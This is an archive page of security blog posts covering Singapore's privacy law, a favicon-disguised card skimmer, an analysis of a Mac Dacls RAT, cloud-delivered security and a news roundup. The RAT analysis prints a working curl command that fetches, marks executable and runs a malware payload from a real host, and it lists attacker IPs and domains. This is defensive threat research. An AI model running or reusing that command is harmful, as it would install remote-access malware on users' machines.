Archive for NEWS

Data privacy law updates eyed by Singapore

In early 2019, Singapore’s data
privacy regulators proposed that the country’s data privacy law could use two
new updates—a data breach notification requirement and a right of data
portability for the country’s residents.

The proposed additions are
commonplace in several data privacy laws around the world, including, most
notably, the European Union General Data Protection Regulation, or GDPR, a sweeping
set of data protections that came into effect two years ago.

If Singapore approves its two updates, it would be the latest country in a long line of other countries to align their own data privacy laws with GDPR.

The appeal is clear: Countries
that closely hew their own data privacy laws to GDPR have a better shot at
obtaining what is called an “adequacy determination” from the European
Commission, meaning those countries can legally transfer data between themselves
and the EU.

Such a data transfer regime is key
to engaging in today’s economy, said D. Reed Freeman Jr., cybersecurity and
privacy practice co-chair at the Washington, D.C.-based law firm Wilmer Cutler
Pickering Hale and Dorr. If anything, the proposed appeal to GDPR is as much an
economic decision as it is one of data privacy rights.

“The world’s economy depends on data flows, and the more restrictive the data flows are, the better,” Freeman said. “Multinational [organizations] in Singapore would like to have an adequacy determination.”

Singapore’s Personal Data Protection Act

On October 15, 2012, Singapore passed its data protection law, the Personal Data Protection Act (PDPA), putting into place new rules for the collection, use, and disclosure of personal data. The PDPA did two other things. It created a national “Do Not Call” register and it established the country’s primary data protection authority, the Personal Data Protection Commission.

For years, the Personal Data Protection Commission has issued warnings to organizations that violate the country’s data protection law, publishing their decisions for the public to read. It is the same commission responsible for the current attempts to update the law.

Today, Singaporeans enjoy some of the same data protection
rights found in the European Union and even in California.

For starters, Singaporeans have the right to request that an
organization hand over any personal data that belongs to them. Further,
Singaporeans also have the right to correct that personal data should they find
any errors or omissions.

Singapore’s data privacy law also includes restrictions for how
organizations collect, use, or disclose the personal data of Singaporeans.

According to the PDPA, organizations must obtain “consent” before
collecting, using, or disclosing personal data (more on that below). Organizations
must also abide by “purpose” limitations, meaning that they can “collect, use
or disclose personal data about an individual only for purposes that a
reasonable person would consider appropriate in the circumstances and, if
applicable, have been notified to the individual concerned.” Organizations must
notify individuals about planned collection, use, and disclosure of personal
data, and collected personal data must be accurate.

Further, any personal data in an organization’s possession
must be protected through the implementation of “reasonable security
arrangements to prevent unauthorized access, collection, use, disclosure,
copying, modification, disposal or similar risks.” And organizations also have
to “cease to retain” documents that contain personal data, or “remove the means
by which the personal data can be associated with particular individuals” after
the purpose for collecting personal data ends.

While these rules sound similar to GDPR, there are discrepancies—including
how Singapore and the EU approach “consent.” In Singapore’s PDPA, consent is
not required to collect personal data when that data is publicly available, is
necessary for broadly defined “evaluative purposes,” or collected solely for “artistic
or literary purposes.” In the EU, there are no similar exceptions.

Two other areas where the laws differ are, of course, data portability
and data breach notification requirements. Singapore’s law has none.

Proposed data privacy additions

On February 25, 2019, Singapore’s Personal Data Protection Commission published a “discussion paper” on data portability, explaining the benefits of adding a data portability requirement to the PDPA.

“Data portability, whereby users are empowered to authorize
the movement of their personal data across organizations, can boost data flows
and support greater data sharing in a digital economy both within and across
sectors,” the PDPC said in a press release.

With a right data portability, individuals can request that
organizations hand over their personal data in a format that lets them easily move
it to another provider and basically plug it in for immediate use. Think of it
like taking your email contacts from one email provider to another, but on a
much larger scale and with potentially less value—it’s not like your Facebook status
updates from 2008 will do you much good on Twitter today.

Less than one week after publishing its data portability discussion paper, the Personal Data Protection Commission also announced plans to add a data breach notification requirement to the PDPA.

The Personal Data Protection Commission proposed that if organizations
suffered a data breach that potentially harmed individuals, those individuals
and the PDPC itself would need to be notified. Further, even if a data breach
brought no potential harm to individuals, organizations would need to notify
the PDPC if more than 500 people’s personal data was affected.

Following public consultations, the data portability requirement was well-received.

Why attempt data privacy updates now?

Aligning a country’s data protection laws with the protections provided in GDPR is nothing new, and in fact, multiple countries around the world are currently engaged in the same process. But Singapore’s timing could potentially be further pinned down to another GDPR development in early January of 2019—an adequacy determination granted by the European Commission to another country, Japan.

Wilmer Hale’s Freeman said it is likely that Singapore looked to Japan and wanted the same.

“[Singapore] is competing in the Asia market and in the
global market, and I would suspect that the leaders in Singapore saw what
happened in Japan, asked the relevant people at the Commission, ‘What do we
need to do to get that?’ and were told ‘If you line up [PDPA] pretty close, we
have a good chance of getting an adequacy determination.’” Freeman said.

Freeman explained that, in recent history, obtaining an
adequacy determination relies on whether a country’s data protection laws are similar
to GDPR.

“Over time, it’s been sort of short-hand thought of as ‘adequacy’
means something close to ‘equivalent,’” Freeman said.

As to the importance, Freeman explained that any
multinational business that wants to move data between its home country and the
EU must, per the rules of GDPR, obtain an adequacy determination. No
determination, no legal opportunity to engage in the world’s economy.

“If you’re a multinational company and you have employees and customers in Europe, and you want to store the data at the home office in Singapore, you need a lawful basis to do that,” Freeman said. An adequacy determination is that legal basis, Freeman said, and it’s far more difficult to “undo” an adequacy determination than it is a bilateral agreement, like the one struck down by the Court of Justice for the European Union between the EU and the United States.

Don’t reinvent the data privacy wheel

Singapore has not proposed a time frame for when it wants to
finalize the data portability rights and data breach notification requirements.
Nor has it specified the actual regulations it would put in place—including how
long before the Personal Data Protection Commission would enforce the new
requirements, or what those enforcement actions would entail.

Freeman suggested that when the Singaporean government clarifies
its proposals, it look to its neighbors across the world who have grappled with
the same questions on data breach notifications and data portability.

For data portability, Freeman explained that many large corporations have already struggled to comply with the rules both in GDPR and in the California Consumer Privacy Act, not because of an inability to do so, but because providing such in-depth data access to individuals requires understanding all the places where an individual’s personal data can live.

“Is it stored locally? On servers in different places? Is it in email? In instant messaging? On posts?” Freeman said.

For data breach notification requirements, Freeman also said
that it makes little sense to create something “out of whole cloth” that will
create new burdens on multinational businesses that already have to comply with
the data breach notification requirements in GDPR and in the 50 US states.

It’s better to find what currently works, Freeman said, and
borrow.

The post Data privacy law updates eyed by Singapore appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

Credit card skimmer masquerades as favicon

Malware authors are notorious for their deceptive attempts at staying one step ahead of defenders. As their schemes get exposed, they always need to go back to their bag of tricks to pull out a new one.

When it comes to online credit card skimmers, we have already seen a number of evasion techniques, some fairly simple and others more elaborate. The goal remains to deceive online shoppers while staying under the radar from website administrators and security scanners.

In this latest instance, we observed an old server-side trick combined with the clever use of an icon file to hide a web skimmer. Threat actors registered a new website purporting to offer thousands of images and icons for download, but which in reality has a single purpose: to act as a façade for a credit card skimming operation.

The suspicious favicon

This latest case started with an image file displayed on the browser’s tab often used for branding or identifying a website, also known as a favicon.

Figure 1: Some favicons from popular websites

While reviewing our crawler logs, we noticed requests to a domain called myicons[.]net hosting various icons and, in particular, favicons. Several e-commerce sites were loading a Magento favicon from this domain.

Figure 2: A favicon.png for the Magento CMS

This in itself is not particularly suspicious. However, we noticed that the domain myicons[.]net was registered just a few days ago and was hosted on a server (83.166.244[.]76) that was previously identified as malicious. In a blog post, web security company Sucuri disclosed how this host was part of a web skimming campaign using time-based domain names.

In addition, we found that the person who registered myicons[.]net stole all the content from a legitimate site hosted at iconarchive.com; and they did it in the most simple way—by loading it as an iframe:

<iframe src="http://www.iconarchive.com/" width="100%"
height="1015px" frameborder="0" align="left">  
Figure 3: Decoy site with original site

Our suspicions were that the favicon.png file was malicious and perhaps using stenography to hide JavaScript code. But this was not the case. The image was properly formatted, with no extra code inside.

Figure 4: Suspicious image file turns out to be clean

Conditional server-side response

To better understand what was going on before ruling this out as a false alert, we examined how this file was served in the context of an online purchase. Low and behold, when visiting the checkout page of a compromised Magento website, the innocent favicon.png turned into something else altogether.

Figure 5: The same web request with a referer including the ‘checkout’ keyword

Instead of serving a PNG image, the malicious server returns JavaScript code that consists of a credit card payment form. This content is loaded dynamically in the DOM to override the PayPal checkout option with its own drop down menu for MasterCard, Visa, Discover and American Express.

Figure 6: Malicious content hijacks default payment form

“Ant and cockroach” skimmer

This skimmer may be familiar to some under the nickname “ant and cockroach.” It is somewhat unique in that it is customized for English and Portuguese checkout forms.

In addition to JavaScript code, it contains HTML that will be injected into the checkout page of compromised stores. The idea is to blend in so that shoppers don’t notice anything suspicious.

Figure 7: Rogue HTML form injected into checkout page

While web skimmers primarily focus on credit card data, they typically also collect additional personal information about the victims including name, address, phone number, email.

Figure 8: Data fields collected by the skimmer

That data is encoded and then sent back to the criminals. For client-side skimmers, the exfiltration domain could be another hacked site or a malicious site registered strictly for this purpose.

Figure 9: Exfiltration code sending data back to the criminals

Here the exfiltration domain is psas[.]pw and resides on known criminal infrastructure on the IP address 83.166.242[.]105. Back in March we described a campaign abusing Cloudflare’s Rocket Loader script which we believe is tied to the same threat group.

One of many web skimmer campaigns

Given the decoy icons domain registration date, this particular scheme is about a week old but is part of a larger number of ongoing skimming attacks.

Malwarebytes users are protected via our real-time web security module available in both Malwarebytes for Windows and via our Browser Guard extension available for both Google Chrome and Mozilla Firefox.

Figure 10: Malwarebytes Browser Guard blocking data exfiltration

Indicators of Compromise

Skimmer URL, domain, IP and SHA256

myicons[.]net/d/favicon.png
myicons[.]net
83.166.244[.]76
825886fc00bef43b3b7552338617697c4e0bab666812c333afdce36536be3b8e

Exfiltration domain and IP

psas[.]pw
83.166.242[.]105

The post Credit card skimmer masquerades as favicon appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app

This blog post was authored by Hossein Jazi, Thomas Reed and Jérôme Segura.

We recently identified what we believe is a new variant of the Dacls Remote Access Trojan (RAT) associated with North Korea’s Lazarus group, designed specifically for the Mac operating system.

Dacls is a RAT that was discovered by Qihoo 360 NetLab in December 2019 as a fully functional covert remote access Trojan targeting the Windows and Linux platforms.

This Mac version is at least distributed via a Trojanized two-factor authentication application for macOS called MinaOTP, mostly used by Chinese speakers. Similar to the Linux variant, it boasts a variety of features including command execution, file management, traffic proxying and worm scanning.

Discovery

On April 8th, a suspicious Mac application named “TinkaOTP” was submitted to VirusTotal from Hong Kong. It was not detected by any engines at the time.

The malicious bot executable is located in “Contents/Resources/Base.lproj/” directory of the application and pretends to be a nib file (“SubMenu.nib”) while it’s a Mac executable file. It contained the strings “c_2910.cls” and “k_3872.cls” which are the names of certificate and private key files that had been previously observed.

Persistence

This RAT persists through LaunchDaemons or LaunchAgents which take a property list (plist) file that specifies the application that needs to be executed after reboot. The difference between LaunchAgents and LaunchDaemons is that LaunchAgents run code on behalf of the logged-in user while LaunchDaemon run code as root user.

When the malicious application starts, it creates a plist file with the “com.aex-loop.agent.plist” name under the “Library/LaunchDaemons” directory. The content of the plist file is hardcoded within the application.

 The program also checks if “getpwuid( getuid())” returns the user id of the current process. If a user id is returned, it creates the plist file “com.aex-loop.agent.plist” under the LaunchAgents directory: “Library/LaunchAgents/”.

Figure 1: Plist file

The file name and directory to store the plist are in hex format and appended together. They show the filename and directory backwards.

Figure 2: Directory and file name generation

Config File

The config file contains the information about the victim’s machine such as Puid, Pwuid, plugins and C&C servers. The contents of the config file are encrypted using the AES encryption algorithm.

Figure 3: Load config

 Both Mac and Linux variants use the same AES key and IV to encrypt and decrypt the config file. The AES mode in both variants is CBC.

Figure 4: AES Key and IV

The config file location and name are stored in hex format within the code. The name of the config file pretends to be a database file related to the Apple Store:

“Library/Caches/Com.apple.appstore.db”

Figure 5: Config file name

The “IntializeConfiguration” function initializes the config file with the following hardcoded C&C servers.

Figure 6: Initialize config file

The config file is constantly updated by receiving commands from the C&C server. The application name after installation is “mina”. Mina comes from the MinaOTP application which is a two-factor authentication app for macOS.

Figure 7: Config file is being updated

Main Loop

After initializing the config file, the main loop is executed to perform the following four main commands:

  • Upload C&C server information from the config file to the server (0x601)
  • Download the config file contents from the server and update the config file (0x602)
  • Upload collected information from the victim’s machine by calling “getbasicinfo” function (0x700)
  • Send heartbeat information (0x900)

The command codes are exactly the same as Linux.dacls.

Figure 8: Main Loop

Plugins

This Mac RAT has all the six plugins seen in the Linux variant with an additional plugin named “SOCKS”. This new plugin is used to proxy network traffic from the victim to the C&C server.

The app loads all the seven plugins at the start of the main loop. Each plugin has its own configuration section in the config file which will be loaded at the initialization of the plugin.

Figure 9: Plugins loaded

CMD plugin

The cmd plugin is similar to the “bash” plugin in the Linux rat which receives and executes commands by providing a reverse shell to the C&C server.

Figure 10: Cmd Plugin

File Plugin

The file plugin has the capability to read, delete, download, and search files within a directory. The only difference between the Mac and Linux version is that the Mac version does not have the capability to write files (Case 0).

Figure 11: File plugin

Process plugin

The process plugin has the capability of killing, running, getting process ID and collecting process information.

Figure 12: Process Plugin

If the “/proc/%d/task” directory of a process is accessible, the plugin obtains the following information from the process where %d is the process ID:

  • Command line arguments of the process by executing “/proc/ %/cmdline”
  • Name, Uid, Gid, PPid of the process from the “/proc/%d/status” file.

Test plugin

The code for the Test plugin between Mac and Linux variant is the same. It checks the connection to an IP and Port specified by the C&C servers.

RP2P plugin

The RP2P plugin is a proxy server used to avoid direct communications from the victim to the actor’s infrastructure.

Figure 13: Reverse P2P

LogSend plugin

The Logsend plugin contains three modules that:

  • Check connection to the Log server
  • Scan network (worm scanner module)
  • Execute long run system commands
Figure 14: Logsend Plugin

This plugin sends the collected logs using HTTP post requests.

Figure 15: User Agent

An interesting function in this plugin is the worm scanner. The “start_worm_scan” can scan a network subnet on ports 8291 or 8292. The subnet that gets scanned is determined based on a set of predefined rules. The following diagram shows the process of selecting the subnet to scan.

Figure 16: Worm Scan

Socks plugin

The Socks plugin is the new, seventh plugin added to this Mac Rat. It is similar to the RP2P plugin and acts as an intermediary to direct the traffic between bot and C&C infrastructure. It uses Socks4 for its proxy communications.

Figure 17: Socks4

Network Communications

C&C communication used by This Mac RAT is similar to the Linux variant. To connect to the server, the application first establishes a TLS connection and then performs beaconing and finally encrypts the data sent over SSL using the RC4 algorithm.

Figure 18: Traffic generated by the Application (.mina)
Figure 19: TLS connection

Both Mac and Linux variants use the WolfSSL library for SSL communications. WolfSSL is an open-source implementation of TLS in C that supports multiple platforms. This library has been used by several threat actors. For example, Tropic Trooper used this library in its Keyboys malware.

Figure 20: WolfSSL

The command codes used for beaconing are the same as the codes used in Linux.dacls. This is to confirm the identity of the bot and the server.

Figure 21: Beconing

The RC4 key is generated by using a hard-coded key.

Figure 22: RC4 Initialization

Variants and detection

We also identified another variant of this RAT which downloads the malicious payload using the following curl command:

curl -k -o ~/Library/.mina https://loneeaglerecords.com/wp-content/uploads/2020/01/images.tgz.001 > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev

We believe this Mac variant of the Dcals RAT is associated with the Lazarus group, also known as Hidden Cobra and APT 38, an infamous North Korean threat actor performing cyber espionage and cyber-crime operations since 2009. 

The group is known to be one of the most sophisticated actors, capable of making custom malware to target different platforms. The discovery of this Mac RAT shows that this APT group is constantly developing its malware toolset.

Malwarebytes for Mac detects this remote administration Trojan as OSX-DaclsRAT.

IOCs

899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53
846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6
216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d
d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd
d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd
loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001 
67.43.239.146
185.62.58.207
50.87.144.227

The post New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

Explained: cloud-delivered security

As a counterpart to security for your assets in the cloud, you may also run into solutions that offer security from the cloud. These solutions are generally referred to as cloud-delivered security. Cloud-delivered security is sometimes called security-as-a-service which we will avoid here as it might be confused with the more generally used term Software-as-a-Service (SaaS).

Types of cloud-delivered security

It is not hard to imagine several types of cloud-delivered security:

  • Definitions or rules for detection are in the cloud
  • Security controls and logs for systems that in multiple places are located in the cloud
  • Suspicious files that are not recognized are uploaded to the cloud for closer inspection
  • The security applications run completely or partially in the cloud and check on the security health of the physical systems

With detection criteria in the cloud there is only one update needed for new definitions and not for every individual system.

Controls and logs in the cloud enable security management to be the spider in the web from virtually anywhere.

The closer inspection of the suspicious
file can be done by the security provider themselves or use a more general
resource like VirusTotal.

Using containerization, security applications can be shared amongst different systems, even if they are running a different operating system.

Models of cloud-delivered security

Besides these different types, there are also three basic cloud delivery models:

  • Software as a Service (SaaS)
  • Platform as a Service (PaaS)
  • Infrastructure as a Service (IaaS)

SaaS clients use applications supplied by a
service provider. SaaS does not allow or require any control of the cloud
platform or the infrastructure. This can be beneficial to some organizations
while others would like at least some control.

PaaS users can deploy consumer-created or
acquired applications using programming languages and tools supported by the
provider’s content policies. This both limits the choices but it also enhances
security.

IaaS is interesting for more sophisticated and demanding users as it allows them to deploy and run arbitrary software. This could apply to both operating systems and applications.

The main difference for these three
delivery models is the internal organization of the cloud infrastructure. For
the user this mainly results in a degree of freedom in how to use the
infrastructure.

Cloud-enabled architecture

A cloud-enabled architecture is by
definition built in the cloud and delivered as a service. This means it
provides a platform that you can easily deploy, and it will help you minimize
the need for costly appliances and backhauling.

Even more than when you are starting to use cloud enabled architecture, moving existing critical capabilities such as endpoint security into the cloud requires careful consideration of a wide range of privacy and security assurances. But sometimes the choice between the two isn’t one that is available. Circumstances do not always allow for the easy path of stepping into a readily prepared platform.

SaaS-based, cloud-enabled architecture should provide customers with a system that can be operational in minutes and requires no on-premise infrastructure. It may combine multiple security functions into one solution, so you can extend protection to devices, remote users, and distributed locations anywhere.

Integrated cloud security service benefits:

  • Flexible security protection on and off network
  • Consistent policies across remote locations
  • Easier to scale on a subscription-based model

Benefits of cloud-delivered security

There are several benefits of cloud-delivered security:

  • The protection will benefit all cloud resources and the SaaS applications
  • It makes it easier to get insight into mobile users, application usage, and overall traffic
  • Enhancement of management efficiency because it can be centralized and done with minimal effort
  • Significant improvement in discovered malware incidents and attempted breaches
  • As a result, a reduction of security related downtime
  • Ease of gathering sufficient audit evidence

What to look for in cloud-delivered security

There are several aspects organizations may
be looking for in a cloud security solution. These can vary by type of
organization and their priorities. In no particular order these may be:

  • Assistance from security
    vendors
  • Cloud administration and
    management
  • Scalability and cost efficiency
  • Protect all critical
    infrastructure
  • Extra features

Security should work for the organization and not the other way around. Security vendors are expected to assume a stronger, more active role in managing and helping the client to maintain the protection of their systems and network(s). Cloud-delivered security allows the organization to focus on their business and abandon or reduce the do-it-yourself security approach.

For businesses looking to simplify their security management through the elimination of hardware, reduced administration, and centralized management, the cloud is the most viable option. And it allows the vendor or a provider to perform remote administration and management.

Cloud-delivered services can dynamically
grow and shrink based on the needs of the organization and you only pay for
what you need based on usage. Moreover, it can also be less expensive to
acquire since they are usually sold on a subscription basis, where payments are
spread out over time.

To optimize the use of assistance, centralized
management, and scalability, a cloud-delivered security solution should be
designed to protect all critical infrastructure, applications, and data
delivered as-a-service.

Usually organizations can add extra services or features to the security solution, which can include, for example, identity management, email security, and other features.

Possible drawbacks of cloud-delivered security

Some organizations may shy away from cloud-delivered security for various reasons.

Organizations may feel they have less control over the functionality of the security solution, which is not always justified as it will depend on the chosen model. And most of the times you will still be able to file feature requests with the vendor and work them out.

Organizations may have doubts about the privacy of the delivered technology and storage of logs in the cloud. But if you can’t trust your security vendor there is a worse problem that needs to be solved first.

Further, data residency can lead to compliance issues for some organizations in some countries. This absolutely should be researched before onboarding with a vendor. It would be a shame to engage in an onboarding process only to find out that there will be compliance issues.

Smaller businesses and cloud-delivered security

Smaller businesses can still profit from cloud-delivered security by acquiring it from a Managed Services Provider (MSP). Security vendors will provide MSPs with a cloud management console where they can keep an eye on all their customers. This enables the MSP to protect, monitor and remediate against security threats.

Stay safe everyone!

The post Explained: cloud-delivered security appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

A week in security (April 27 – May 3)

Last week on Malwarebytes Labs, we looked at how secure the cloud is, understood why unexpected demand can influence an organization to consider their “just in time” (JIT) system, speculated on why the threat actors behind the Troldesh ransomware suddenly released thousands of decryption keys, preached the good news about VPN being mainstream, touched on the relationship between cybercrime and a challenged economy, and identified what users can do if they received an extortion email.

Other cybersecurity news

  • The season of threat actors banking on coronavirus continues as fake news sites spring up to promote a “pandemic survival book.” (Source: Avast Blog)
  • Cybersecurity experts warned small- to medium-sized businesses about an increase in targeted attacks, thanks to the pandemic (Source: TechRadar)
  • While internet users are using VPN all the more, experts have seen attacks on something probably no one has thought about protecting: the router. (Source: InfoSecurity)
  • Phishers targeted Zoom users yet again with spoofed meeting notifications that would likely cause them to panic and click the phishing link. (Source: Source: Bleeping Computer)
  • Payment card details owned by US and South Korean citizens were reportedly sold underground for $2M USD. (Source: Group-IB)
  • While governments have renewed interest into using contact tracing apps to help contain COVID-19, the interest in using Bluetooth attacks may naturally follow. (Source: ZDNet)
  • Israel’s National Cyber Directorate published an alert about attacks on supervisory control and data acquisition (SCADA) systems. (Source: Security Week)
  • Parking meter vendor CivicSmart was attacked by ransomware and had their data stolen. (Source: StateScoop)
  • Some ransomware gangs opted out of targeting hospitals. For some, it’s business as usual. Colorado hospital shut down by ransomware. (Source: Health IT Security)
  • OceanLotus APT is suspected to be behind an espionage campaign dubbed PhantomLance, which targeted specific victims in Southeast Asia. (Source: Threatpost)

Stay safe everyone!

The post A week in security (April 27 – May 3) appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →
Page 234 of 252 «...210220230232233234235236...»